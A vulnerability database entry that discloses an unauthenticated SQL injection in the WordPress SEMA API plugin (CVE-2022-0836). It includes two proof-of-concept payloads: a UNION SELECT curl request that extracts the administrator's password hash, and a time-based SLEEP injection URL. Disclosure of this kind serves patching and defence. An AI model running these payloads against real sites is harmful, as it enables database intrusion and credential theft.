Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitCydaveWPEX-ID:2A226AE8-7D9C-4F47-90AF-8A399A08F03F
HistoryApr 13, 2022 - 12:00 a.m.

SEMA API < 4.02 - Unauthenticated SQLi

2022-04-1300:00:00
cydave
160
sema api
sql injection
unauthenticated
version 3.64
version 4.02
exploit

EPSS

0.002

Percentile

57.6%

JSON

The plugin does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users

v < 3.64:
curl http://example.com/wp-admin/admin-ajax.php --data 'action=get_semadata&type=attributes&catid=-3 UNION ALL SELECT 1,2,3,(SELECT user_pass FROM wp_users WHERE ID = 1),5-- -'

v < 4.02
https://example.com/wp-admin/admin-ajax.php?action=get_semadata&type=deleteattribute&catid=1&attrids=1%29 AND %28SELECT 42 FROM %28SELECT%28SLEEP%285%29%29%29b

Related

prion 1
cve 1
patchstack 1
nvd 1
wpvulndb 1
cvelist 1
prion
prion
Sql injection
2022-05-09 17:15:00
cve
cve
CVE-2022-0836
2022-05-09 17:15:08
patchstack
patchstack
WordPress SEMA API plugin < 4.02 - Unauthenticated SQL Injection (SQLi) vulnerability
2022-04-13 00:00:00
nvd
nvd
CVE-2022-0836
2022-05-09 17:15:08
wpvulndb
wpvulndb
SEMA API < 4.02 - Unauthenticated SQLi
2022-04-13 00:00:00
cvelist
cvelist
CVE-2022-0836 SEMA API < 4.02 - Unauthenticated SQLi
2022-05-09 16:50:37

EPSS

0.002

Percentile

57.6%

JSON
Related for WPEX-ID:2A226AE8-7D9C-4F47-90AF-8A399A08F03F
prion1cve1patchstack1nvd1wpvulndb1cvelist1